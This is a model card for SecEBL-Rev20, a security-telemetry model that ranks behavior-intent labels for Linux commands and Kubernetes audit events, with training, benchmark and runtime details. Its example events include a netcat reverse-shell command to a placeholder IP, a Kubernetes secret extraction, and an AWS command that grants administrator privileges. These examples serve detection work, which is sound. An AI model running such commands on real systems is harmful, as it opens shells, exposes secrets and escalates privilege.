	---
	license: apache-2.0
	base_model: Alibaba-NLP/gte-modernbert-base
	library_name: sentence-transformers
	pipeline_tag: sentence-similarity
	tags:
	- security
	- intrusion-detection
	- behavior-analytics
	- intent-recognition
	- linux
	- kubernetes
	- audit-log
	- sentence-transformers
	---

	# SecEBL-Rev20

	SecEBL stands for Security Event Behavior Labeler.

	SecEBL-Rev20 is an intent-recognition model for security telemetry. It maps a
	Linux command line or normalized Kubernetes AuditLog event into ranked
	behavior-intent labels, so downstream detection can reason about what an actor
	is trying to do instead of only matching fixed strings, allowlists, denylists,
	or opaque risk scores.

	Project repository: [github.com/EBWi11/SecEBL](https://github.com/EBWi11/SecEBL)

	## At A Glance

	\| Area \| Current release summary \|
	\| --- \| --- \|
	\| Stable public API \| L1 behavior-intent labeling with ranked `top_labels`. \|
	\| Behavior vocabulary \| 361 Rev20 behavior-intent tags across 12 security behavior groups. \|
	\| Training scale \| 86,285 internal corpus rows, 82,895 usable training observations, and 118,858 effective command/tag training pairs. \|
	\| Corpus breadth \| Linux commands plus normalized Kubernetes AuditLog events, covering roughly 2,700 distinct Linux first-token/tool forms and common security/operations tooling. \|
	\| Benchmark scale \| 12,594-row internal Linux command benchmark covering all 361 behavior tags, 663 internal Linux sessions, and a 6,286,568-row / 102,117-session pressure stream. \|
	\| L1 accuracy \| 98.49% top5 any-hit and 96.44% micro recall@5 on the internal Linux command benchmark; 100.00% top5 coverage on the K8s evaluation set. \|
	\| Inference performance \| RTX 5090 spot-check: mean 5,308.72 unique cmdlines/s with FP16 + SDPA; exact raw-event cache lookup measured separately at about 1.8M rows/s. \|
	\| Training setup \| `Alibaba-NLP/gte-modernbert-base`, MNRL with hard-negative-aware batches, RTX 5090 32GB, 128 full-pass epochs, batch size 112, about 16.2 hours. \|

	The public examples include a reviewed, publicly releasable subset of the
	internal Linux final benchmark plus normalized Kubernetes AuditLog examples:
	10,520 Linux rows across 531 sessions and 144 K8s rows across 46 sessions. They
	exist so users can run the model locally and inspect outputs without access to
	private telemetry.
	The full training corpora, full internal benchmarks, private pressure-stream
	rows, and private run logs are not redistributed because parts of them contain
	real telemetry or real operational context.

	## First-Time User Path

	Use the companion GitHub repository for the runnable code and this Hugging Face
	repository for model artifacts:

	```bash
	git clone https://github.com/EBWi11/SecEBL.git
	cd SecEBL

	git lfs install
	git clone https://huggingface.co/willchen0011/SecEBL model_artifacts

	pip install -e .
	scripts/run_examples.sh
	```

	After the script finishes, inspect:

	```text
	runs/examples/linux_l1/predictions.jsonl
	runs/examples/l2/example_linux_session_results.json
	```

	L1 is the stable behavior-labeling API. It outputs ranked behavior evidence,
	not an intrusion verdict. L2 is optional and experimental; it runs only when an
	L2 artifact such as `model_artifacts/l2_artifacts/logreg.joblib` is available.

	## What This Repository Contains

	This Hugging Face repository is the model artifact bundle.

	\| Path \| Purpose \|
	\| --- \| --- \|
	\| `model.safetensors`, tokenizer/config files \| SentenceTransformers-compatible SecEBL-Rev20 embedding model. \|
	\| `semantic_texts.jsonl` \| Rev20 semantic label texts used by the L1 retrieval path. \|
	\| `schema/tags_schema_rev20.json` \| Canonical Rev20 behavior vocabulary, 361 tags across 12 groups. \|
	\| `examples/linux/` \| Public subset of the internal Linux final benchmark and matching Rev20 labels. \|
	\| `examples/k8s/` \| Public normalized Kubernetes AuditLog examples and matching Rev20 labels. \|
	\| `examples/manifest.json` \| Public example subset counts and distribution. \|
	\| `rev20_tag_rfc.md` \| Rev20 behavior-tag labeling RFC and boundary examples. \|
	\| `l2_artifacts/logreg.joblib` \| Experimental L2 logistic-regression session scorer. \|
	\| `l2_artifacts/tag_risk_policy.rev20.json` \| Matching L2 feature policy. Its tag-selection settings are internal to L2 feature extraction. \|
	\| `l2_artifacts/train_summary.json` \| Public aggregate L2 training/evaluation summary with no raw rows or real session identifiers. \|
	\| `LICENSE`, `NOTICE` \| Model license and attribution notices. \|

	This repository does not include the runnable helper scripts. Use
	[EBWi11/SecEBL](https://github.com/EBWi11/SecEBL) for the Python package and
	one-command test script. The same public benchmark-subset examples are included
	here for convenience.

	## Output Shape

	L1 predictions expose ranked `top_labels`:

	```json
	{
	  "observation_id": "event:0",
	  "command": "nc -e /bin/sh 203.0.113.10 4444",
	  "top_labels": [
	    {
	      "label_id": "spawn_reverse_shell",
	      "score": 0.811,
	      "axis": "execution_and_process"
	    },
	    {
	      "label_id": "connect_external_service",
	      "score": 0.488,
	      "axis": "network"
	    }
	  ]
	}
	```

	L1 does not emit `behavior_tags` and does not apply a user-facing tag-selection
	threshold. `behavior_tags[]` is the field used by training and evaluation label
	files. Runtime prediction output is ranked `top_labels`.
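
A minimal sketch of consuming this output, assuming `predictions.jsonl` holds one JSON object per line with the fields shown above. The helper name `best_labels` and the `min_score` cutoff are illustrative and are not part of the released helpers:

```python
import json
from typing import Iterable, Iterator, Tuple


def best_labels(
    lines: Iterable[str], min_score: float = 0.0
) -> Iterator[Tuple[str, str, float]]:
    """Yield (observation_id, label_id, score) for the best label of each record."""
    for line in lines:
        line = line.strip()
        if not line:
            continue  # tolerate blank lines in the file
        record = json.loads(line)
        labels = record.get("top_labels", [])
        if not labels:
            continue  # nothing was ranked for this event
        # Pick the highest score explicitly instead of trusting list order.
        top = max(labels, key=lambda item: item["score"])
        if top["score"] >= min_score:
            yield record["observation_id"], top["label_id"], top["score"]


# Demo on the record shown above, serialized as a single JSONL line.
sample = json.dumps({
    "observation_id": "event:0",
    "command": "nc -e /bin/sh 203.0.113.10 4444",
    "top_labels": [
        {"label_id": "spawn_reverse_shell", "score": 0.811,
         "axis": "execution_and_process"},
        {"label_id": "connect_external_service", "score": 0.488,
         "axis": "network"},
    ],
})
results = list(best_labels([sample]))
print(results)
```

For a real run, an open file handle on `runs/examples/linux_l1/predictions.jsonl` can be passed as `lines`. Any cutoff is a consumer-side choice; L1 itself applies no threshold.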

	## Why Intent Labels Matter

	Traditional IDS pipelines often depend on signatures, rules, allowlists,
	denylists, and low-explainability tabular ML. Those tools still matter, but
	they can struggle when legitimate tools are used in suspicious ways, when tool
	syntax drifts quickly, or when the same behavior appears in different telemetry
	formats.

	SecEBL adds an intermediate representation:

	```text
	raw security event
	-> L1 behavior-intent recognition
	-> L2 session reasoning or another downstream detector
	-> alert / review / policy
	```

	L1 intentionally does not decide that a single event is an intrusion. It
	produces explainable behavior evidence such as `read_credential_material`,
	`execute_remote_command`, `create_scheduled_task`, `grant_cluster_privilege`,
	or `query_service_health`.

	This is useful for:

	- LOTL (living-off-the-land) behavior, where the tool is legitimate but the
	behavior may be suspicious in context.
	- Rule-writing lag, where new tool syntax appears faster than signatures can be
	maintained.
	- Multi-platform telemetry, where Linux commands, Kubernetes audit events, and
	future telemetry can share a behavior vocabulary.
	- Explainable detection, where an alert should be tied to explicit behavior
	labels rather than only an opaque score.

	## Data And Vocabulary

	Rev20 is a flat behavior-tag schema.

	\| Item \| Count \|
	\| --- \| ---: \|
	\| Top-level behavior groups \| 12 \|
	\| Behavior tags \| 361 \|

	Schema groups:

	\| Group \| Tags \|
	\| --- \| ---: \|
	\| `observation_and_discovery` \| 51 \|
	\| `configuration_and_log_modification` \| 12 \|
	\| `filesystem_and_data` \| 33 \|
	\| `execution_and_process` \| 28 \|
	\| `network` \| 51 \|
	\| `identity_auth_and_secrets` \| 31 \|
	\| `persistence_services_and_storage` \| 27 \|
	\| `kernel_memory_and_tracing` \| 14 \|
	\| `package_build_and_source` \| 19 \|
	\| `database_and_infrastructure_services` \| 33 \|
	\| `containers_and_cloud_native` \| 34 \|
	\| `cloud_control_plane` \| 28 \|
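
As a quick consistency check, the per-group counts in the table above can be summed and compared with the headline vocabulary size. The dictionary below is copied from the table by hand; it is not read from `schema/tags_schema_rev20.json`, whose internal layout is not described here:

```python
# Per-group tag counts, transcribed from the table above.
GROUP_TAG_COUNTS = {
    "observation_and_discovery": 51,
    "configuration_and_log_modification": 12,
    "filesystem_and_data": 33,
    "execution_and_process": 28,
    "network": 51,
    "identity_auth_and_secrets": 31,
    "persistence_services_and_storage": 27,
    "kernel_memory_and_tracing": 14,
    "package_build_and_source": 19,
    "database_and_infrastructure_services": 33,
    "containers_and_cloud_native": 34,
    "cloud_control_plane": 28,
}

group_count = len(GROUP_TAG_COUNTS)
total_tags = sum(GROUP_TAG_COUNTS.values())
print(group_count, total_tags)  # 12 361
```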

	The release baseline was trained from internal Rev20 corpora:

	\| Corpus \| Rows \| Unique behavior tags \| Notes \|
	\| --- \| ---: \| ---: \| --- \|
	\| Linux command corpus \| 85,277 \| 361 \| Mixed generated, reviewed, and manually expanded command examples. \|
	\| Kubernetes AuditLog corpus \| 1,008 \| 40 \| Manually authored normalized K8s audit events. \|

	The Linux corpus covers roughly 2,700 distinct first-token/tool forms by a
	conservative executable-name estimate. Common families include shell utilities,
	network tools, package/build tools, cloud CLIs, IaC tools, container tooling,
	databases, secret stores, and Kubernetes tooling.

	## Training Details

	The raw training corpora are not redistributed, but the following details are
	documented so readers can understand the model scale and method.

	\| Item \| Value \|
	\| --- \| --- \|
	\| Base model \| `Alibaba-NLP/gte-modernbert-base` \|
	\| Training objective \| `MultipleNegativesRankingLoss` with hard-negative-aware batches \|
	\| Training hardware \| NVIDIA GeForce RTX 5090, 32GB VRAM, `cuda:0` \|
	\| Epochs \| 128 full-pass epochs \|
	\| Batch size \| 112 \|
	\| Precision \| `fp32` \|
	\| Steps \| 1,062 steps per epoch; 135,936 total optimizer steps \|
	\| Runtime \| 58,291 seconds, about 16.2 hours \|
	\| Sequence length \| 160 tokens \|
	\| Optimizer schedule \| learning rate `2e-5`, warmup ratio `0.06`, 8,156 warmup steps, weight decay `0.01` \|

	Training data scale:

	\| Training artifact \| Count \| Notes \|
	\| --- \| ---: \| --- \|
	\| Combined corpus rows \| 86,285 \| 85,277 Linux command rows plus 1,008 K8s AuditLog rows. \|
	\| Non-empty training observations \| 82,895 \| Rows with usable behavior labels after skipping 3,390 abstain rows. \|
	\| Base command-tag pairs \| 117,092 \| Positive command/tag pairs before boundary upsampling. \|
	\| Effective positive pairs \| 118,858 \| Final pair count after targeted boundary upsampling. \|
	\| Behavior labels \| 361 \| Full Rev20 behavior vocabulary used on the label side. \|
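
The step counts in the training table can be reproduced from the pair count, batch size, and epoch count. This is a worked check rather than the training script: it assumes the final partial batch of each epoch is kept (ceiling division) and that warmup steps are rounded down, which is what matches the reported figures.

```python
import math

base_pairs = 117_092        # positive pairs before boundary upsampling
upsampled_pairs = 1_766     # extra exposures from boundary upsampling
batch_size = 112
epochs = 128
warmup_ratio = 0.06

effective_pairs = base_pairs + upsampled_pairs
# Assumption: the last, smaller batch of each epoch is not dropped.
steps_per_epoch = math.ceil(effective_pairs / batch_size)
total_steps = steps_per_epoch * epochs
# Assumption: warmup steps are truncated to an integer.
warmup_steps = int(total_steps * warmup_ratio)

print(effective_pairs, steps_per_epoch, total_steps, warmup_steps)
# 118858 1062 135936 8156
```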

	The Linux corpus is intentionally mixed rather than a single synthetic source.
	The largest source slices are roughly 36.9k generated rows, 28.5k manually
	reviewed rows, 4.0k benchmark-prune/migration rows, 3.6k common-difference gap
	rows, 2.7k reviewed generated rows, 2.6k baseline manual rows, and 2.3k attack
	batch rows, plus smaller targeted boundary, miss-review, public-attack, and
	high-miss batches.

	Token lengths are short enough for a compact encoder. Across the final pair set,
	command-side text is p50 32 tokens, p90 55, p95 68, and p99 113; fewer than
	0.3% of examples exceed the 160-token training limit. Label-side semantic texts
	are p50 40 tokens and p95 62.

	Hard negatives were designed in two layers, followed by boundary upsampling:

	- Schema-level negatives: the dataset builder used `schema_hard`, with a
	16-item hard-negative pool and up to 8 negatives per positive before MNRL
	batching. These negatives come from semantically nearby Rev20 tags, so the
	model is forced to separate labels such as read-vs-search, inspect-vs-modify,
	local-vs-remote execution, and similar tool-boundary cases.
	- Batch-level negatives: the training loader used hard-negative-aware MNRL
	batches. The final run used config
	`rev20_conservative_20260620_ep96_miss_v11`, covering 74 difficult labels and
	placing 2 hard-negative labels near each anchor where possible.
	- Boundary upsampling: 1,766 boundary-sensitive pairs were duplicated once,
	producing 1,766 extra training exposures. These rows target recurring failure
	modes such as grep/read ambiguity, wrapper commands, tool-specific boundaries,
	no-hit review cases, and post-evaluation miss-review batches.
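
To illustrate why batch composition matters for this objective, here is a minimal pure-Python sketch of a multiple-negatives ranking loss over in-batch negatives. It is not the training code for this release: the `scale` value is an assumption, the vectors are toy data, and real training operates on encoder embeddings.

```python
import math
from typing import List, Sequence


def cosine(a: Sequence[float], b: Sequence[float]) -> float:
    """Cosine similarity of two vectors (0.0 if either has zero norm)."""
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norm if norm else 0.0


def mnrl_loss(
    anchors: List[Sequence[float]],
    positives: List[Sequence[float]],
    scale: float = 20.0,  # assumed value, not a documented training setting
) -> float:
    """Mean cross-entropy where positives[i] is the target for anchors[i]
    and every other positive in the batch serves as a negative."""
    losses = []
    for i, anchor in enumerate(anchors):
        logits = [scale * cosine(anchor, p) for p in positives]
        peak = max(logits)  # subtract the max for a stable log-sum-exp
        log_sum = peak + math.log(sum(math.exp(v - peak) for v in logits))
        losses.append(log_sum - logits[i])
    return sum(losses) / len(losses)


# Easy batch: the two label vectors are orthogonal.
easy = mnrl_loss([[1.0, 0.0], [0.0, 1.0]], [[1.0, 0.0], [0.0, 1.0]])
# Hard batch: the second label sits close to the first one.
hard = mnrl_loss([[1.0, 0.0], [0.8, 0.6]], [[1.0, 0.0], [0.8, 0.6]])
print(easy < hard)
```

When semantically nearby labels share a batch, the in-batch negatives are harder to separate and the loss is larger, which is the effect hard-negative-aware batching aims for.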

	## Public Benchmark Subset

	This Hugging Face repository includes the same public benchmark examples as the
	companion GitHub repository: the Linux benchmark subset under `examples/linux/`
	and normalized Kubernetes AuditLog examples under `examples/k8s/`.

	\| Public artifact \| Rows \| Sessions \| Notes \|
	\| --- \| ---: \| ---: \| --- \|
	\| `examples/linux/example_sessions.jsonl` \| 10,520 \| 531 \| Publicly releasable subset of the internal Linux final benchmark; 2,934 normal-operation rows and 7,586 intrusion rows. \|
	\| `examples/linux/example_gold.rev20.jsonl` \| 10,520 \| 531 \| Matching Rev20 behavior labels; 10,019 labeled rows, 14,807 behavior-label instances, and 349 unique behavior tags. \|
	\| `examples/k8s/example_sessions.jsonl` \| 144 \| 46 \| Public normalized Kubernetes AuditLog examples; 72 normal-operation rows and 72 intrusion rows. \|
	\| `examples/k8s/example_gold.rev20.jsonl` \| 144 \| 46 \| Matching Rev20 behavior labels; 144 labeled rows, 163 behavior-label instances, and 27 unique behavior tags. \|

	Session-level labels use English enums: `normal_operation` and `intrusion`.
	The full internal Linux benchmark remains larger: 12,594 rows, 663 sessions,
	and complete 361-tag coverage.

	## Evaluation Snapshot

	The full internal benchmark data is not public. The aggregate size,
	distribution, and metrics are public so users can understand what the headline
	numbers mean.

	Evaluation scale:

	\| Dataset \| Rows \| Rows with labels \| Behavior-tag instances \| Unique behavior tags \|
	\| --- \| ---: \| ---: \| ---: \| ---: \|
	\| Linux internal benchmark \| 12,594 \| 11,889 \| 17,287 \| 361 / 361 \|
	\| K8s evaluation set \| 144 \| 144 \| 163 \| 27 / 361 \|
	\| Combined \| 12,738 \| 12,033 \| 17,450 \| 361 / 361 \|

	Retrieval quality:

	\| Dataset \| Dynamic exact \| Top5 any-hit \| Top5 all-covered \| Micro recall@5 \|
	\| --- \| ---: \| ---: \| ---: \| ---: \|
	\| Linux internal benchmark \| 87.32% \| 98.49% \| 95.44% \| 96.44% \|
	\| K8s evaluation set \| 99.31% \| 100.00% \| 100.00% \| 100.00% \|
	\| Combined \| 87.47% \| 98.50% \| 95.50% \| 96.47% \|

	The Linux benchmark covers the complete 361-tag Rev20 vocabulary and includes
	complex multi-tag command rows. The K8s result should be read as a small-domain
	sanity result rather than broad Kubernetes coverage because the current K8s
	corpus is much smaller than the Linux corpus.
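
The metric names in the retrieval table are not formally defined in this card. The sketch below shows one plausible reading of three of them, stated as assumptions: top5 any-hit is the share of labeled rows with at least one gold tag in the top 5, top5 all-covered is the share with every gold tag in the top 5, and micro recall@5 is the share of all gold-tag instances found in the top 5. "Dynamic exact" is not covered here.

```python
from typing import Dict, List, Sequence, Set


def top_k_metrics(
    gold: Sequence[Set[str]], ranked: Sequence[List[str]], k: int = 5
) -> Dict[str, float]:
    """Compute any-hit, all-covered, and micro recall over labeled rows."""
    rows = any_hit = all_covered = found = instances = 0
    for gold_tags, ranked_tags in zip(gold, ranked):
        if not gold_tags:
            continue  # rows without gold labels are skipped (assumption)
        hits = len(gold_tags & set(ranked_tags[:k]))
        rows += 1
        any_hit += int(hits > 0)
        all_covered += int(hits == len(gold_tags))
        found += hits
        instances += len(gold_tags)
    if rows == 0:
        raise ValueError("no labeled rows to evaluate")
    return {
        "any_hit": any_hit / rows,
        "all_covered": all_covered / rows,
        "micro_recall": found / instances,
    }


# Toy data with hypothetical tag names "a", "b", "c".
gold = [{"a"}, {"a", "b"}, {"c"}, set()]
ranked = [["a", "x"], ["a", "y"], ["z"], ["q"]]
metrics = top_k_metrics(gold, ranked)
print(metrics)
```

Under these definitions any-hit is always at least as high as micro recall, which in turn is at least as high as all-covered on single-tag-dominated data, consistent with the ordering in the table.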

	Internal Linux benchmark tag cardinality:

	\| Tags per row \| Rows \|
	\| --- \| ---: \|
	\| 0 \| 705 \|
	\| 1 \| 8,829 \|
	\| 2 \| 1,567 \|
	\| 3 \| 901 \|
	\| 4 \| 402 \|
	\| 5 \| 139 \|
	\| 6+ \| 51 \|

	Top internal Linux benchmark tags:

	\| Tag \| Count \|
	\| --- \| ---: \|
	\| `stage_temporary_path` \| 987 \|
	\| `inspect_network_state` \| 801 \|
	\| `stage_hidden_path` \| 655 \|
	\| `inspect_current_identity` \| 578 \|
	\| `read_credential_material` \| 551 \|
	\| `inspect_system_state` \| 481 \|
	\| `inspect_infrastructure_service` \| 390 \|
	\| `query_dns_records` \| 372 \|
	\| `enumerate_filesystem` \| 365 \|
	\| `search_credentials` \| 315 \|

	## Example Outputs

	These examples show the user-facing L1 output style. Scores are cosine-similarity
	retrieval scores computed with the release prompt profile applied. The public
	helper scripts save the ranked labels in `predictions.jsonl`.

	\| Event \| Top 3 L1 tags \| Note \|
	\| --- \| --- \| --- \|
	\| `nc -e /bin/sh 203.0.113.10 4444` \| <code>spawn_reverse_shell</code> 0.811<br><code>connect_external_service</code> 0.488<br><code>spawn_bind_shell</code> 0.451 \| `-e` is recognized as reverse-shell execution. \|
	\| `nc -v 203.0.113.10 443` \| <code>connect_external_service</code> 0.732<br><code>spawn_reverse_shell</code> 0.503<br><code>create_reverse_tunnel</code> 0.412 \| Connection intent ranks above shell-spawn intent. \|
	\| `cat /root/install.log` \| <code>read_business_log</code> 0.641<br><code>read_system_log</code> 0.431<br><code>read_workload_logs</code> 0.385 \| Log-read semantics dominate. \|
	\| `cat /root/install.conf` \| <code>read_infrastructure_config</code> 0.620<br><code>read_system_config</code> 0.612<br><code>read_kernel_parameter</code> 0.336 \| Config-read semantics dominate. \|
	\| `kubectl -n prod get secret payment-api-token -o jsonpath={.data.token} \\| base64 -d` \| <code>read_cluster_secret</code> 0.730<br><code>decode_data</code> 0.716<br><code>read_credential_material</code> 0.363 \| K8s secret extraction and decoding. \|
	\| `aws iam attach-user-policy --user-name temp --policy-arn arn:aws:iam::aws:policy/AdministratorAccess` \| <code>grant_cloud_privilege</code> 0.838<br><code>modify_cloud_identity_policy</code> 0.535<br><code>modify_cloud_identity</code> 0.459 \| Cloud privilege escalation semantics. \|
	\| `curl -fsS http://127.0.0.1:8080/healthz` \| <code>query_service_health</code> 0.840<br><code>inspect_local_kubernetes_cluster</code> 0.459<br><code>inspect_container_runtime</code> 0.383 \| Local service health check. \|

	## Runtime Performance

	SecEBL-Rev20 is a SentenceTransformers-style embedding retriever over 361 Rev20
	tag definitions. The serving path embeds the event, embeds or loads tag
	definition embeddings, then ranks tags by similarity.

	Current single-card CUDA recommendation:

	\| Setting \| Value \|
	\| --- \| --- \|
	\| Precision \| FP16 \|
	\| Attention \| SDPA \|
	\| `max_seq_length` \| 160 \|
	\| Batch size \| 224 default; 384 was slightly faster in one RTX 5090 sweep but not enough to replace the stable default \|
	\| Sorting \| `sort_by=char` \|
	\| Padding \| dynamic, no forced pad alignment \|
	\| Output path \| GPU tensor output plus GPU top-k \|

	Measured on an NVIDIA GeForce RTX 5090 32GB spot-check:

	\| Mode \| Throughput \|
	\| --- \| ---: \|
	\| Recommended no-cache unique inference, `bs224` \| mean 5,308.72 unique cmdlines/s \|
	\| Recommended no-cache amortized time, `bs224` \| about 0.1884 ms per unique cmdline (1 / throughput) \|
	\| `bs224` repeat range \| 5,025.47 - 5,433.78 unique cmdlines/s \|
	\| Best quick-sweep point, `bs384` \| 5,378.45 unique cmdlines/s \|

	Exact raw-event cache lookup was measured separately at mean 1,817,462.76
	rows/s. Cache hits reuse saved L1 top-k results and do not run model inference.
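
The cache behavior can be sketched as a dictionary keyed on the raw event string. This is an illustration only: the class name `ExactEventCache`, the in-memory unbounded store, and the `infer` callable are assumptions, not the released implementation.

```python
from typing import Callable, Dict, List, Tuple

TopK = List[Tuple[str, float]]  # ranked (label_id, score) pairs


class ExactEventCache:
    """Reuse saved top-k results for events seen before (exact string match)."""

    def __init__(self, infer: Callable[[List[str]], List[TopK]]):
        self._infer = infer            # batch inference function (hypothetical)
        self._store: Dict[str, TopK] = {}
        self.hits = 0
        self.misses = 0

    def label(self, events: List[str]) -> List[TopK]:
        # Deduplicate unseen events so each one is inferred only once.
        missing = list(dict.fromkeys(e for e in events if e not in self._store))
        if missing:
            for event, top_k in zip(missing, self._infer(missing)):
                self._store[event] = top_k
        self.misses += len(missing)
        self.hits += len(events) - len(missing)
        return [self._store[e] for e in events]


# Demo with a stand-in for the model that records how often it is called.
calls: List[List[str]] = []


def fake_infer(batch: List[str]) -> List[TopK]:
    calls.append(list(batch))
    return [[("query_service_health", 0.84)] for _ in batch]


cache = ExactEventCache(fake_infer)
cmd = "curl -fsS http://127.0.0.1:8080/healthz"
cache.label([cmd, cmd])
cache.label([cmd])
print(len(calls), cache.hits, cache.misses)
```

Because security telemetry tends to repeat the same command lines, the unique-inference throughput and the cache-lookup throughput describe two different paths and should not be compared directly.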

	## L2 Artifact

	This repository includes an experimental fitted L2 session scorer so the
	companion GitHub `scripts/run_examples.sh` can run the public Linux and K8s L1
	examples, plus Linux example-session scoring, when this model directory is used
	as `MODEL_DIR`.

	In this release, a session is a sequence of events grouped by `session_id`.
	L1 labels each event independently. L2 scores the whole session by aggregating
	cached L1 ranked tags, retrieval scores, tag diversity, behavior transitions,
	and routine-operation context. The L2 output is a session-level verdict such as
	`intrusion` or `normal_operation`, not a replacement for per-command behavior
	tags.
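
To make the session-level idea concrete, here is a rough sketch of grouping per-event L1 output by session and deriving a few aggregates such as tag diversity and behavior transitions. The feature names and the presence of a `session_id` field on each prediction are assumptions for illustration; the released L2 feature builder is not reproduced here.

```python
from collections import Counter, defaultdict
from typing import Dict, List


def session_features(predictions: List[dict]) -> Dict[str, dict]:
    """Aggregate top-1 labels per session into simple illustrative features."""
    sessions = defaultdict(list)
    for pred in predictions:
        if pred["top_labels"]:
            # Assumes top_labels is ordered best-first, as in ranked output.
            sessions[pred["session_id"]].append(pred["top_labels"][0])

    features = {}
    for session_id, tops in sessions.items():
        labels = [t["label_id"] for t in tops]
        features[session_id] = {
            "events": len(labels),
            "distinct_labels": len(set(labels)),
            # Count adjacent events whose top label changes.
            "transitions": sum(1 for a, b in zip(labels, labels[1:]) if a != b),
            "max_score": max(t["score"] for t in tops),
            "label_counts": dict(Counter(labels)),
        }
    return features


preds = [
    {"session_id": "s1", "top_labels": [{"label_id": "inspect_current_identity", "score": 0.70}]},
    {"session_id": "s1", "top_labels": [{"label_id": "read_credential_material", "score": 0.60}]},
    {"session_id": "s1", "top_labels": [{"label_id": "read_credential_material", "score": 0.80}]},
    {"session_id": "s2", "top_labels": [{"label_id": "query_service_health", "score": 0.84}]},
]
feats = session_features(preds)
print(feats["s1"])
```

The session id is used here only to group events, not as a feature in its own right.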

	For compatibility with the released L2 artifact, L2 derives its session
	features from cached L1 `top_labels` using an internal selected-tag feature
	path. In plain terms, L2 filters the cached ranked labels inside its own feature
	builder before session scoring. This does not change L1 prediction output:
	users still receive ranked `top_labels`, not a selected `behavior_tags` field.

	Runtime L2 does not use raw command text, user names, host names, or session ids
	as scoring features. Session ids may appear in private data-prep workflows for
	label assignment, but they are not runtime allow/deny lists.

	Internal L2 summary:

	\| Check \| Result \|
	\| --- \| ---: \|
	\| Withheld Linux session benchmark \| 663 sessions, 365 TP, 298 TN, 0 FP, 0 FN \|
	\| 7M pressure-stream fit-check \| 6,286,568 rows, 102,117 sessions, 61 alert sessions \|
	\| OOF validation \| 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall \|

	The pressure-stream result (labeled 7M above; 6,286,568 rows in total) was
	measured on real background telemetry plus embedded synthetic attack sessions.
	The underlying rows and real session identifiers are not redistributed. The
	included L2 artifact is a research/reproducibility component, not a general
	production IDS claim.
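
For readers who want to relate the counts in the summary table to rates, the following worked example derives accuracy, precision, and recall from the withheld-benchmark confusion counts, and the share of pressure-stream sessions that raised an alert. The helper name `binary_metrics` is illustrative.

```python
from typing import Dict


def binary_metrics(tp: int, tn: int, fp: int, fn: int) -> Dict[str, float]:
    """Standard accuracy, precision, and recall from confusion counts."""
    total = tp + tn + fp + fn
    return {
        "accuracy": (tp + tn) / total,
        "precision": tp / (tp + fp) if (tp + fp) else 0.0,
        "recall": tp / (tp + fn) if (tp + fn) else 0.0,
    }


# Withheld Linux session benchmark: 365 TP, 298 TN, 0 FP, 0 FN.
withheld = binary_metrics(tp=365, tn=298, fp=0, fn=0)

# Pressure stream: 61 alert sessions out of 102,117 sessions.
alert_share = 61 / 102_117

print(withheld, f"{alert_share:.4%}")
```

The alert share works out to roughly 0.06% of sessions. It is not a false-positive rate, because the stream contains embedded synthetic attack sessions and the card does not break the 61 alerts down further.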

	## Direct SentenceTransformers Loading

	You can load the embedding model directly:

	```python
	from sentence_transformers import SentenceTransformer

	model = SentenceTransformer("willchen0011/SecEBL")
	```

	Direct loading gives you the encoder only. SecEBL is a retrieval-style labeler:
	encode the event, encode or load the Rev20 semantic label texts from
	`semantic_texts.jsonl`, rank labels by cosine similarity, and save the top-k
	labels. For normal use, prefer the companion GitHub helpers because they keep
	the prompt profile, semantic text loading, top-k output format, and optional L2
	feature path aligned with this release.
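
If you do want to experiment with the encoder directly, the retrieval step described above can be sketched as follows. The function takes any `encode` callable and a mapping from label id to semantic text, so it makes no assumption about the field names inside `semantic_texts.jsonl`. It does not apply the release prompt profile, so scores may differ from the numbers in this card; the label texts in the demo are made up.

```python
import math
from typing import Callable, Dict, List, Sequence, Tuple


def cosine(a: Sequence[float], b: Sequence[float]) -> float:
    """Cosine similarity of two vectors (0.0 if either has zero norm)."""
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norm if norm else 0.0


def rank_labels(
    encode: Callable[[List[str]], List[Sequence[float]]],
    event_text: str,
    label_texts: Dict[str, str],
    top_k: int = 5,
) -> List[Tuple[str, float]]:
    """Return the top_k (label_id, cosine score) pairs for one event."""
    label_ids = list(label_texts)
    vectors = encode([event_text] + [label_texts[i] for i in label_ids])
    event_vec, label_vecs = vectors[0], vectors[1:]
    scored = [(lid, cosine(event_vec, vec)) for lid, vec in zip(label_ids, label_vecs)]
    scored.sort(key=lambda pair: pair[1], reverse=True)
    return scored[:top_k]


# Toy bag-of-words encoder standing in for the real model in this demo.
def toy_encode(texts: List[str]) -> List[List[float]]:
    vocab = ["read", "secret", "health", "check"]
    return [[float(t.lower().split().count(w)) for w in vocab] for t in texts]


labels = {  # hypothetical semantic texts, not the released ones
    "read_cluster_secret": "read secret",
    "query_service_health": "health check",
}
ranked = rank_labels(toy_encode, "read the secret token", labels, top_k=2)
print(ranked)

# With the real encoder (requires sentence-transformers and the model files):
# from sentence_transformers import SentenceTransformer
# model = SentenceTransformer("willchen0011/SecEBL")
# encode = lambda texts: model.encode(texts).tolist()
```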

	## Intended Use

	- Research and evaluation of security-event behavior labeling.
	- Internal security detection, investigation, and triage for systems an
	organization owns, operates, administers, or is explicitly authorized to
	defend.
	- Building session-level risk scoring over SecEBL behavior-label streams.

	## Out Of Scope

	- Standalone verdicting on a single event.
	- Authorization or policy-compliance decisions without human validation.
	- Monitoring systems you are not authorized to defend.

	## License

	This Hugging Face repository is released under Apache License 2.0.

	The base model is `Alibaba-NLP/gte-modernbert-base`, which is also Apache-2.0.
	Source code, schemas, public examples, public documentation, helper scripts,
	model artifacts, and the experimental L2 artifact are Apache-2.0 unless a file
	explicitly states otherwise.